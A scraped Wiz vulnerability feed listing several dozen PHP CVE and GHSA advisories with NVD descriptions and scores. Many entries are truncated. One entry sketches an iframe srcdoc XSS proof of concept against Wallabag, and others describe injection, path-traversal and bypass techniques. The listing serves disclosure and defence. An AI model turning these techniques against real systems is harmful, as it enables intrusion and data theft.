OpenSTAManager is an open source management software for technical assistance and invoicing. OpenSTAManager v2.9.8 and earlier contain a critical Error-Based SQL Injection vulnerability in the bulk operations handler for the Scadenzario (Payment Schedule) module. The application fails to validate that elements of the id_records array are integers before using them in an SQL IN() clause, allowing attackers to inject arbitrary SQL commands and extract sensitive data through XPATH error messages.
Source : NVD
## 8.7
Score
Published February 6, 2026
Severity HIGH
CNA Score 8.7
Affected Technologies
PHP
Has Public Exploit Yes
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Exploitation Probabi
Wiz
CVE-2026-33293 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 8.1
CVE-2026-33293 [HIGH] CVE-2026-33293 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2026-33293 :
PHP vulnerability analysis and mitigation
deleteDump
plugin/CloneSite/cloneServer.json.php
unlink()
../../
configuration.php
Source : NVD
## 8.1
Score
Published March 22, 2026
Severity HIGH
CNA Score 8.1
Affected Technologies
PHP
Has Public Exploit Yes
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Exploitation Probability Percentile (EPSS) 14.6
Exploitation Probability (EPSS) N/A
Affected packages and libraries
wwbn/avideo
Sources
NVD
Composer Severity HIGH No Fix Added at: Mar 20, 2026
Wiz
CVE-2026-35452 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 5.3
CVE-2026-35452 [MEDIUM] CVE-2026-35452 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2026-35452 :
PHP vulnerability analysis and mitigation
WWBN AVideo is an open source video platform. In versions 26.0 and prior, the plugin/CloneSite/client.log.php endpoint serves the clone operation log file without any authentication. Every other endpoint in the CloneSite plugin directory enforces User::isAdmin(). The log contains internal filesystem paths, remote server URLs, and SSH connection metadata.
Source : NVD
## 5.3
Score
Published April 6, 2026
Severity MEDIUM
CNA Score 5.3
Affected Technologies
PHP
Has Public Exploit No
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Exploitation Probability Percentile (EPSS) 9.7
Exploitation Probability (EPSS) N/A
Affected packages and libraries
wwbn/avideo
Sources
NVD
Composer Severity M
Wiz
CVE-2026-34738 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 4.3
CVE-2026-34738 [MEDIUM] CVE-2026-34738 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2026-34738 :
PHP vulnerability analysis and mitigation
WWBN AVideo is an open source video platform. In versions 26.0 and prior, AVideo's video processing pipeline accepts an overrideStatus request parameter that allows any uploader to set a video's status to any valid state, including "active" (a). This bypasses the admin-controlled moderation and draft workflows. The setStatus() method validates the status code against a list of known values but does not verify that the caller has permission to set that particular status. As a result, any user with upload permissions can publish videos directly, circumventing content review processes. At time of publication, there are no publicly available patches.
Source : NVD
## 4.3
Score
Published March 31, 2026
Severity MEDIUM
CNA Sc
Wiz
CVE-2026-33041 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 5.3
CVE-2026-33041 [MEDIUM] CVE-2026-33041 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2026-33041 :
PHP vulnerability analysis and mitigation
WWBN AVideo is an open source video platform. In versions 25.0 and below, /objects/encryptPass.json.php exposes the application's password hashing algorithm to any unauthenticated user. An attacker can submit arbitrary passwords and receive their hashed equivalents, enabling offline password cracking against leaked database hashes. If an attacker obtains password hashes from the database (via SQL injection, backup exposure, etc.), they can instantly crack them by comparing against pre-computed hashes from this endpoint. This endpoint eliminates the need for an attacker to reverse-engineer the hashing algorithm. Combined with the weak hash chain (md5+whirlpool+sha1, no salt by default), an attacker with access to database hashe
Wiz
CVE-2026-30838 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 5.1
CVE-2026-30838 [MEDIUM] CVE-2026-30838 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2026-30838 :
PHP vulnerability analysis and mitigation
league/commonmark is a PHP Markdown parser. Prior to version 2.8.1, the DisallowedRawHtml extension can be bypassed by inserting a newline, tab, or other ASCII whitespace character between a disallowed HTML tag name and the closing >. For example, would pass through unfiltered and be rendered as a valid HTML tag by browsers. This is a cross-site scripting (XSS) vector for any application that relies on this extension to sanitize untrusted user input. All applications using the DisallowedRawHtml extension to process untrusted markdown are affected. Applications that use a dedicated HTML sanitizer (such as HTML Purifier) on the rendered output are not affected. This issue has been patched in version 2.8.1.
Source : NVD
## 5.1
Wiz
CVE-2026-33486 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 6.8
CVE-2026-33486 [MEDIUM] CVE-2026-33486 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2026-33486 :
PHP vulnerability analysis and mitigation
Roadiz is a polymorphic content management system based on a node system that can handle many types of services. A vulnerability in roadiz/documents prior to versions 2.7.9, 2.6.28, 2.5.44, and 2.3.42 allows an authenticated attacker to read any file on the server's local file system that the web server process has access to, including highly sensitive environment variables, database credentials, and internal configuration files. Versions 2.7.9, 2.6.28, 2.5.44, and 2.3.42 contain a patch.
Source : NVD
## 6.5
Score
Published March 26, 2026
Severity MEDIUM
CNA Score 6.8
Affected Technologies
PHP
Has Public Exploit Yes
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Wiz · blogs_wiz
GHSA-3h6j-9x8m-rg3g Impact, Exploitability, and Mitigation Steps | Wiz
## GHSA-3h6j-9x8m-rg3g : PHP vulnerability analysis and mitigation
## Summary
cleanupXss()
safe=1
'elements' => '*+iframe-meta'
srcdoc
|raw
## Root Cause
src/Graby.php
```php
htmLawed($html, [
    'safe' => 1, // removes
    'elements' => '*+iframe-meta', // re-adds , overrides safe=1
    'deny_attribute' => 'style', // srcdoc is NOT denied
]);
```
safe=1
+iframe
safe
srcdoc
## Proof of Concept
cleanupXss()
Output (unchanged — htmLawed passes it through):
{{ content|raw }}
srcdoc
about:srcdoc
alert(document.domain)
cleanupXss()
## Impact
|raw
In Wallabag: affects both authenticated views and public share pages (unauthenticated)
No CSP headers in default Wallabag config — no secondary mitigation
## Suggested Fix
+iframe
'elements' => '*-iframe-meta',
srcdoc
'deny_attri
Wiz · blogs_wiz · CVSS 5.3 · MEDIUM
CVE-2026-4208 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2026-4208 : PHP vulnerability analysis and mitigation
The extension fails to properly reset the generated MFA code after successful authentication. This leads to a possible MFA bypass for future login attempts by providing an empty string as the MFA code to the extension's MFA provider.
Source : NVD
Score 7.7
Published March 17, 2026
Severity HIGH
CNA Score 7.7
Affected Technologies
PHP
Has Public Exploit No
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Exploitation Probability Percentile (EPSS) 17.2
Exploitation Probability (EPSS) 0.1
Affected packages and libraries
ralffreit/mfa-email
Sources
NVD
Composer Severity HIGH Has Fix Added at: Mar 19, 2026
Wiz · blogs_wiz · CVSS 9.9 · CRITICAL
CVE-2026-27591 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2026-27591 : PHP vulnerability analysis and mitigation
Winter is a free, open-source content management system (CMS) based on the Laravel PHP framework. Prior to 1.0.477, 1.1.12, and 1.2.12, Winter CMS allowed authenticated backend users to escalate their account's level of access to the system by modifying the roles / permissions assigned to their account through specially crafted requests to the backend while logged in. To actively exploit this security issue, an attacker would need access to the Backend with a user account with any level of access. This vulnerability is fixed in 1.0.477, 1.1.12, and 1.2.12.
Source : NVD
Score 9.9
Published March 11, 2026
Severity CRITICAL
CNA Score 9.9
Affected Technologies
PHP
Has Public Exploit No
Has CISA KEV Exploit No
Wiz · blogs_wiz · CVSS 8.2 · HIGH
CVE-2026-34236 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2026-34236 : PHP vulnerability analysis and mitigation
Auth0-PHP is a PHP SDK for Auth0 Authentication and Management APIs. From version 8.0.0 to before version 8.19.0, in applications built with the Auth0 PHP SDK, cookies are encrypted with insufficient entropy, which may result in threat actors brute-forcing the encryption key and forging session cookies. This issue has been patched in version 8.19.0.
Source : NVD
Score 8.2
Published April 1, 2026
Severity HIGH
CNA Score 8.2
Affected Technologies
PHP
Has Public Exploit No
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Exploitation Probability Percentile (EPSS) 1.3
Exploitation Probability (EPSS) N/A
Affected packages and libraries
auth0/auth0-php
Sources
NVD
Composer Severity HIGH
Wiz · blogs_wiz · CVSS 8.6 · HIGH
CVE-2026-25497 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2026-25497 : PHP vulnerability analysis and mitigation
Craft is a platform for creating digital experiences. In Craft versions from 4.0.0-RC1 to before 4.17.0-beta.1 and 5.9.0-beta.1, there is a Privilege Escalation vulnerability in Craft CMS’s GraphQL API that allows an authenticated user with write access to one asset volume to escalate their privileges and modify/transfer assets belonging to any other volume, including restricted or private volumes to which they should not have access. The saveAsset GraphQL mutation validates authorization against the schema-resolved volume but fetches the target asset by ID without verifying that the asset belongs to the authorized volume. This allows unauthorized cross-volume asset modification and transfer. This vulnerability is fixed in 4.1
Wiz · blogs_wiz · CVSS 8.1 · HIGH
CVE-2025-67848 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2025-67848 : PHP vulnerability analysis and mitigation
A flaw was found in Moodle. This authentication bypass vulnerability allows suspended users to authenticate through the Learning Tools Interoperability (LTI) Provider. The issue arises from the LTI authentication handlers failing to enforce the user's suspension status, enabling unauthorized access to the system. This can lead to information disclosure or other unauthorized actions by users who should be restricted.
Source : NVD
Score 8.1
Published February 3, 2026
Severity HIGH
CNA Score 8.1
Affected Technologies
PHP
NixOS
Has Public Exploit No
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Exploitation Probability Percentile (EPSS) 15.3
Exploitation Probability (EPSS) 0.1
Wiz · blogs_wiz · CVSS 9.8 · CRITICAL
CVE-2025-51511 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2025-51511 : PHP vulnerability analysis and mitigation
Cadmium CMS v.0.4.9 has a background arbitrary file upload vulnerability in /admin/content/filemanager/uploads.
Source : NVD
Score 9.8
Published December 23, 2025
Severity CRITICAL
CNA Score 9.8
Affected Technologies
PHP
Has Public Exploit Yes
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Exploitation Probability Percentile (EPSS) 22.8
Exploitation Probability (EPSS) 0.1
Affected packages and libraries
cadmium-org/cadmium-cms
Sources
NVD
Composer Severity HIGH No Fix Added at: Dec 24, 2025
Wiz · blogs_wiz · CVSS 2.3 · LOW
CVE-2026-1195 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2026-1195 : PHP vulnerability analysis and mitigation
A weakness has been identified in MineAdmin 1.x/2.x. This impacts the function refresh of the file /system/refresh of the component JWT Token Handler. This manipulation causes insufficient verification of data authenticity. It is possible to initiate the attack remotely. The attack is considered to have high complexity. The exploitability is said to be difficult. The exploit has been made available to the public and could be used for attacks. The vendor was contacted early about this disclosure but did not respond in any way.
Source : NVD
Score 2.3
Published January 20, 2026
Severity LOW
CNA Score 2.3
Affected Technologies
PHP
Has Public Exploit Yes
Has CISA KEV Exploit No
CISA KEV Release Date N/A
Wiz · blogs_wiz · CVSS 2.3 · LOW
CVE-2026-2994 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2026-2994 : PHP vulnerability analysis and mitigation
Concrete CMS below version 9.4.8 is subject to CSRF by a Rogue Administrator using the Anti-Spam Allowlist Group Configuration via the group_id parameter, which can lead to a security bypass since changes are saved prior to checking the CSRF token. The Concrete CMS security team gave this vulnerability a CVSS v.4.0 score of 2.3 with vector CVSS:4.0/AV:N/AC:L/AT:P/PR:L/UI:P/VC:N/VI:L/VA:N/SC:N/SI:N/SA:N. Thanks z3rco for reporting
Source : NVD
Score 2.3
Published March 4, 2026
Severity LOW
CNA Score 2.3
Affected Technologies
PHP
Has Public Exploit Yes
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Exploitation Probability Percentile (EPSS) 6.3
Exploitation Probability (EPSS) N/A
Wiz · blogs_wiz · CVSS 6.9 · MEDIUM
CVE-2026-34973 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2026-34973 : PHP vulnerability analysis and mitigation
phpMyFAQ is an open source FAQ web application. Prior to version 4.1.1, the searchCustomPages() method in phpmyfaq/src/phpMyFAQ/Search.php uses real_escape_string() (via escape()) to sanitize the search term before embedding it in LIKE clauses. However, real_escape_string() does not escape SQL LIKE metacharacters % (match any sequence) and _ (match any single character). An unauthenticated attacker can inject these wildcards into search queries, causing them to match unintended records — including content that was not meant to be surfaced — resulting in information disclosure. This issue has been patched in version 4.1.1.
Source : NVD
Score 6.9
Published April 2, 2026
Severity MEDIUM
CNA Score 6.9
Wiz · blogs_wiz · CVSS 6.0 · MEDIUM
CVE-2025-66578 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2025-66578 : PHP vulnerability analysis and mitigation
xmlseclibs is a library written in PHP for working with XML Encryption and Signatures. Versions 3.1.3 contain an authentication bypass vulnerability due to a flaw in the libxml2 canonicalization process during document transformation. When libxml2’s canonicalization is invoked on an invalid XML input, it may return an empty string rather than a canonicalized node. xmlseclibs then proceeds to compute the DigestValue over this empty string, treating it as if canonicalization succeeded. This issue is fixed in version 3.1.4. Workarounds include treating canonicalization failures (exceptions or nil/empty outputs) as fatal and aborting validation, and/or adding explicit checks to reject when canonicalize returns nil/empty or raises
Wiz · blogs_wiz · CVSS 9.4 · CRITICAL
CVE-2025-67510 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2025-67510 : PHP vulnerability analysis and mitigation
Neuron is a PHP framework for creating and orchestrating AI Agents. In versions 2.8.11 and below, the MySQLWriteTool executes arbitrary SQL provided by the caller using PDO::prepare() + execute() without semantic restrictions. This is consistent with the name (“write tool”), but in an LLM/agent context it becomes a high-risk capability: prompt injection or indirect prompt manipulation can cause execution of destructive queries such as DROP TABLE, TRUNCATE, DELETE, ALTER, or privilege-related statements (subject to DB permissions). Deployments that expose an agent with MySQLWriteTool enabled to untrusted input and/or run the tool with a DB user that has broad privileges are impacted. This issue is fixed in version 2.8.12.
Wiz · blogs_wiz · CVSS 5.5 · MEDIUM
CVE-2026-1194 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2026-1194 : PHP vulnerability analysis and mitigation
A security flaw has been discovered in MineAdmin 1.x/2.x. This affects an unknown function of the component Swagger. The manipulation results in information disclosure. The attack may be performed from remote. The exploit has been released to the public and may be used for attacks. The vendor was contacted early about this disclosure but did not respond in any way.
Source : NVD
Score 5.5
Published January 20, 2026
Severity MEDIUM
CNA Score 5.5
Affected Technologies
PHP
Has Public Exploit Yes
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Exploitation Probability Percentile (EPSS) 17.5
Exploitation Probability (EPSS) 0.1
Affected packages and libraries
mineadmin/mineadmin
Wiz · blogs_wiz · CVSS 5.3 · MEDIUM
CVE-2026-4267 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2026-4267 : PHP vulnerability analysis and mitigation
The Query Monitor – The developer tools panel for WordPress plugin for WordPress is vulnerable to Reflected Cross-Site Scripting via the ‘$_SERVER['REQUEST_URI']’ parameter in all versions up to, and including, 3.20.3 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that execute if they can successfully trick a user into performing an action such as clicking on a link.
Source : NVD
Score 7.2
Published March 31, 2026
Severity HIGH
CNA Score 7.2
Affected Technologies
PHP
WordPress
Has Public Exploit No
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Wiz · blogs_wiz · CVSS 7.2 · HIGH
CVE-2026-2469 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2026-2469 : PHP vulnerability analysis and mitigation
Versions of the package directorytree/imapengine before 1.22.3 are vulnerable to Improper Neutralization of Special Elements in Output Used by a Downstream Component ('Injection') via the id() function in ImapConnection.php due to improperly escaping user input before including it in IMAP ID commands. This allows attackers to read or delete victim's emails, terminate the victim's session or execute any valid IMAP command on victim's mailbox by including quote characters " or CRLF sequences \r\n in the input.
Source : NVD
Score 7.2
Published February 14, 2026
Severity HIGH
CNA Score 7.2
Affected Technologies
PHP
Has Public Exploit No
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Wiz · blogs_wiz · CVSS 9.1 · CRITICAL
CVE-2026-26279 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2026-26279 : PHP vulnerability analysis and mitigation
Froxlor is open source server administration software. Prior to 2.3.4, a typo in Froxlor's input validation code (== instead of =) completely disables email format checking for all settings fields declared as email type. This allows an authenticated admin to store arbitrary strings in the panel.adminmail setting. This value is later concatenated into a shell command executed as root by a cron job, where the pipe character | is explicitly whitelisted. The result is full root-level Remote Code Execution. This vulnerability is fixed in 2.3.4.
Source : NVD
Score 9.1
Published March 3, 2026
Severity CRITICAL
CNA Score 9.1
Affected Technologies
PHP
Has Public Exploit Yes
Has CISA KEV Exploit No
Wiz · blogs_wiz · CVSS 5.3 · MEDIUM
CVE-2026-35538 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2026-35538 : PHP vulnerability analysis and mitigation
An issue was discovered in Roundcube Webmail before 1.5.14 and 1.6.14. Unsanitized IMAP SEARCH command arguments could lead to IMAP injection or CSRF bypass during mail search.
Source : NVD
Score 3.1
Published April 3, 2026
Severity LOW
CNA Score 3.1
Affected Technologies
PHP
Linux Debian
Has Public Exploit No
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Exploitation Probability Percentile (EPSS) 10.5
Exploitation Probability (EPSS) N/A
Affected packages and libraries
roundcube
roundcube/roundcubemail
Sources
NVD
Debian 11, 12, 13, 14 Severity LOW Has Fix Added at: Apr 05, 2026
Echo Severity LOW Has Fix Added at: Apr 05, 2026
Composer Severity LOW Has Fix Added at: Apr 05,
Wiz · blogs_wiz · CVSS 7.7 · HIGH
CVE-2026-31891 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2026-31891 : PHP vulnerability analysis and mitigation
/api/content/aggregate/{model}
_state=1
toJsonPath()
toJsonExtractRaw()
lib/MongoLite/Aggregation/Optimizer.php
Source : NVD
Score 6.5
Published March 18, 2026
Severity MEDIUM
CNA Score 7.7
Affected Technologies
PHP
NixOS
Has Public Exploit No
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Exploitation Probability Percentile (EPSS) 1.1
Exploitation Probability (EPSS) N/A
Affected packages and libraries
cockpit-hq/cockpit
cockpit
Sources
NVD
Composer Severity HIGH Has Fix Added at: Mar 17, 2026
Nix Severity MEDIUM Has Fix Added at: Mar 22, 2026
Wiz · blogs_wiz · CVSS 5.3 · MEDIUM
GHSA-jg68-vhv3-9r8f Impact, Exploitability, and Mitigation Steps | Wiz
## GHSA-jg68-vhv3-9r8f : PHP vulnerability analysis and mitigation
## Impact
The admin URL can be discovered without prior knowledge of its location by exploiting the X-Original-Url header on some configurations.
## Patches
The bug comes from the Zend library and is patched by unsetting the header in the bootstrap process.
## Workarounds
X-Original-Url
## References
The activation of these headers is coming from the Zend_Controller module. It appears this has been known to some degree since 2016 - https://peterocallaghan.co.uk/2016/12/magento-poisoning-cache/ (dead link now..)
## Credit
Anees Hyder ( @anees0xdev ) via HackerOne https://hackerone.com/anees0x_dev/hacktivity
Source : NVD
Score 5.3
Published February 2, 2026
Severity MEDIUM
CNA Score N/A
Wiz · blogs_wiz · CVSS 9.3 · CRITICAL
CVE-2026-30849 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2026-30849 : PHP vulnerability analysis and mitigation
Mantis Bug Tracker (MantisBT) is an open source issue tracker. Versions prior to 2.28.1 running on MySQL family databases are affected by an authentication bypass vulnerability in the SOAP API, as a result of an improper type checking on the password parameter. Other database backends are not affected, as they do not perform implicit type conversion from string to integer. Using a crafted SOAP envelope, an attacker knowing the victim's username is able to login to the SOAP API with their account without knowledge of the actual password, and execute any API function they have access to. Version 2.28.1 contains a patch. Disabling the SOAP API significantly reduces the risk, but still allows the attacker to retrieve user account
Wiz · blogs_wiz · CVSS 6.5 · MEDIUM
CVE-2026-30662 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2026-30662 : PHP vulnerability analysis and mitigation
ConcreteCMS v9.4.7 contains a Denial of Service (DoS) vulnerability in the File Manager component. The 'download' method in 'concrete/controllers/backend/file.php' improperly manages memory when creating zip archives. It uses 'ZipArchive::addFromString' combined with 'file_get_contents', which loads the entire content of every selected file into PHP memory. An authenticated attacker can exploit this by requesting a bulk download of large files, triggering an Out-Of-Memory (OOM) condition that causes the PHP-FPM process to terminate (SIGSEGV) and the web server to return a 500 error.
Source : NVD
Score 6.5
Published March 24, 2026
Severity MEDIUM
CNA Score 6.5
Affected Technologies
PHP
Has Public Exploit Yes
Wiz · blogs_wiz · CVSS 6.1 · MEDIUM
CVE-2025-61676 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2025-61676 : PHP vulnerability analysis and mitigation
October is a Content Management System (CMS) and web platform. Prior to versions 3.7.13 and 4.0.12, a cross-site scripting (XSS) vulnerability was identified in October CMS backend configuration forms. A user with the Customize Backend Styles permission could inject malicious HTML/JS into the stylesheet input at Styles from Branding & Appearance settings. A specially crafted input could break out of the intended context, allowing arbitrary script execution across backend pages for all users. This issue has been patched in versions 3.7.13 and 4.0.12.
Source : NVD
Score 4.8
Published January 10, 2026
Severity MEDIUM
CNA Score 6.1
Affected Technologies
PHP
Homebrew
Has Public Exploit No
Has CISA KEV Exploit No
Wiz · blogs_wiz · CVSS 6.5 · MEDIUM
CVE-2026-33882 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2026-33882 : PHP vulnerability analysis and mitigation
Statamic is a Laravel and Git powered content management system (CMS). Prior to versions 5.73.16 and 6.7.2, the markdown preview endpoint could be manipulated to return augmented data from arbitrary fieldtypes. With the users fieldtype specifically, an authenticated control panel user could retrieve sensitive user data including email addresses, encrypted passkey data, and encrypted two-factor authentication codes. This has been fixed in 5.73.16 and 6.7.2.
Source : NVD
Score 6.5
Published March 27, 2026
Severity MEDIUM
CNA Score 6.5
Affected Technologies
PHP
Has Public Exploit No
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Exploitation Probability Percentile (EPSS) 17.5
Wiz · blogs_wiz · CVSS 8.1 · HIGH
CVE-2025-67507 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2025-67507 : PHP vulnerability analysis and mitigation
Filament is a collection of full-stack components for accelerated Laravel development. Versions 4.0.0 through 4.3.0 contain a flaw in the handling of recovery codes for app-based multi-factor authentication, allowing the same recovery code to be reused indefinitely. This issue does not affect email-based MFA. It also only applies when recovery codes are enabled. This issue is fixed in version 4.3.1.
Source : NVD
Score 8.1
Published December 10, 2025
Severity HIGH
CNA Score 8.1
Affected Technologies
PHP
Has Public Exploit No
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Exploitation Probability Percentile (EPSS) 26.6
Exploitation Probability (EPSS) 0.1
Wiz · blogs_wiz · CVSS 5.4 · MEDIUM
CVE-2026-30964 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2026-30964 : PHP vulnerability analysis and mitigation
web-auth/webauthn-lib is an open source set of PHP libraries and a Symfony bundle to allow developers to integrate that authentication mechanism into their web applications. Prior to 5.2.4, when allowed_origins is configured, CheckAllowedOrigins reduces URL-like values to their host component and accepts on host match alone. This makes exact origin policies impossible to express: scheme and port differences are silently ignored. This vulnerability is fixed in 5.2.4.
Source : NVD
Score 5.4
Published March 10, 2026
Severity MEDIUM
CNA Score 5.4
Affected Technologies
PHP
Wolfi
Has Public Exploit No
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Wiz · blogs_wiz · CVSS 1.9 · LOW
CVE-2026-25491 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2026-25491 : PHP vulnerability analysis and mitigation
Craft is a platform for creating digital experiences. From 5.0.0-RC1 to 5.8.21, Craft has a stored XSS via Entry Type names. The name is not sanitized when displayed in the Entry Types list. This vulnerability is fixed in 5.8.22.
Source : NVD
Score 1.9
Published February 9, 2026
Severity LOW
CNA Score 1.9
Affected Technologies
PHP
Craft CMS
Has Public Exploit Yes
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Exploitation Probability Percentile (EPSS) 4.2
Exploitation Probability (EPSS) N/A
Affected packages and libraries
craftcms/cms
cpe:2.3:a:craftcms:craft_cms
Sources
Composer Severity LOW Has Fix Added at: Feb 10, 2026
Linux Severity MEDIUM Has Fix Added at: Feb 10, 2026
Wiz · blogs_wiz · CVSS 8.2 · HIGH
CVE-2025-14180 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2025-14180 : PHP vulnerability analysis and mitigation
In PHP versions 8.1.* before 8.1.34, 8.2.* before 8.2.30, 8.3.* before 8.3.29, 8.4.* before 8.4.16, 8.5.* before 8.5.1 when using the PDO PostgreSQL driver with PDO::ATTR_EMULATE_PREPARES enabled, an invalid character sequence (such as \x99) in a prepared statement parameter may cause the quoting function PQescapeStringConn to return NULL, leading to a null pointer dereference in pdo_parse_params() function. This may lead to crashes (segmentation fault) and affect the availability of the target server.
Source : NVD
Score 8.2
Published December 27, 2025
Severity HIGH
CNA Score 8.2
Affected Technologies
PHP
Rocky Linux
Has Public Exploit Yes
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/
Wiz · blogs_wiz · CVSS 8.3 · HIGH
CVE-2026-21857 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2026-21857 : PHP vulnerability analysis and mitigation
EXPDIR
../
.tar.gz
Source : NVD
Score 8.3
Published January 7, 2026
Severity HIGH
CNA Score 8.3
Affected Technologies
PHP
Has Public Exploit Yes
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Exploitation Probability Percentile (EPSS) 7.5
Exploitation Probability (EPSS) N/A
Affected packages and libraries
redaxo/source
Sources
NVD
Composer Severity HIGH Has Fix Added at: Jan 06, 2026
Wiz · blogs_wiz · CVSS 6.3 · MEDIUM
CVE-2026-33347 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2026-33347 : PHP vulnerability analysis and mitigation
league/commonmark is a PHP Markdown parser. From version 2.3.0 to before version 2.8.2, the DomainFilteringAdapter in the Embed extension is vulnerable to an allowlist bypass due to a missing hostname boundary assertion in the domain-matching regex. An attacker-controlled domain like youtube.com.evil passes the allowlist check when youtube.com is an allowed domain. This issue has been patched in version 2.8.2.
Source : NVD
Score 6.3
Published March 24, 2026
Severity MEDIUM
CNA Score 6.3
Affected Technologies
PHP
Linux Debian
Has Public Exploit No
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Exploitation Probability Percentile (EPSS) 17.7
Exploitation Probability (EPSS) 0.1
Wiz · blogs_wiz · CVSS 8.8 · HIGH
CVE-2026-33717 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2026-33717 : PHP vulnerability analysis and mitigation
downloadVideoFromDownloadURL()
objects/aVideoEncoder.json.php
.php
resolution
die()
forbiddenPage()
videos/cache/tmpFile/
Source : NVD
Score 8.8
Published March 23, 2026
Severity HIGH
CNA Score 8.8
Affected Technologies
PHP
Has Public Exploit Yes
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Exploitation Probability Percentile (EPSS) 15.5
Exploitation Probability (EPSS) 0.1
Affected packages and libraries
wwbn/avideo
Sources
NVD
Composer Severity HIGH No Fix Added at: Mar 26, 2026
Wiz · blogs_wiz · CVSS 7.3 · HIGH
CVE-2026-21450 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2026-21450 : PHP vulnerability analysis and mitigation
Bagisto is an open source laravel eCommerce platform. Versions prior to 2.3.10 are vulnerable to server-side template injection via type parameter, which can lead to remote code execution or another exploitation. Version 2.3.10 fixes the issue.
Source : NVD
Score 7.3
Published January 2, 2026
Severity HIGH
CNA Score 7.3
Affected Technologies
PHP
Has Public Exploit No
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Exploitation Probability Percentile (EPSS) 72.4
Exploitation Probability (EPSS) 0.7
Affected packages and libraries
bagisto/bagisto
Sources
NVD
Composer Severity HIGH Has Fix Added at: Jan 03, 2026
Wiz · blogs_wiz · CVSS 5.3 · MEDIUM
CVE-2026-33761 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2026-33761 : PHP vulnerability analysis and mitigation
list.json.php
add.json.php
delete.json.php
index.php
User::isAdmin()
Source : NVD
Score 5.3
Published March 27, 2026
Severity MEDIUM
CNA Score 5.3
Affected Technologies
PHP
Has Public Exploit Yes
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Exploitation Probability Percentile (EPSS) 22.2
Exploitation Probability (EPSS) 0.1
Affected packages and libraries
wwbn/avideo
Sources
NVD
Composer Severity MEDIUM No Fix Added at: Mar 29, 2026
Wiz · blogs_wiz · CVSS 9.1 · CRITICAL
CVE-2026-30877 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2026-30877 : PHP vulnerability analysis and mitigation
baserCMS is a website development framework. Prior to version 5.2.3, there is an OS command injection vulnerability in the update functionality. Due to this issue, an authenticated user with administrator privileges in baserCMS can execute arbitrary OS commands on the server with the privileges of the user account running baserCMS. This issue has been patched in version 5.2.3.
Source : NVD
Score 7.2
Published March 31, 2026
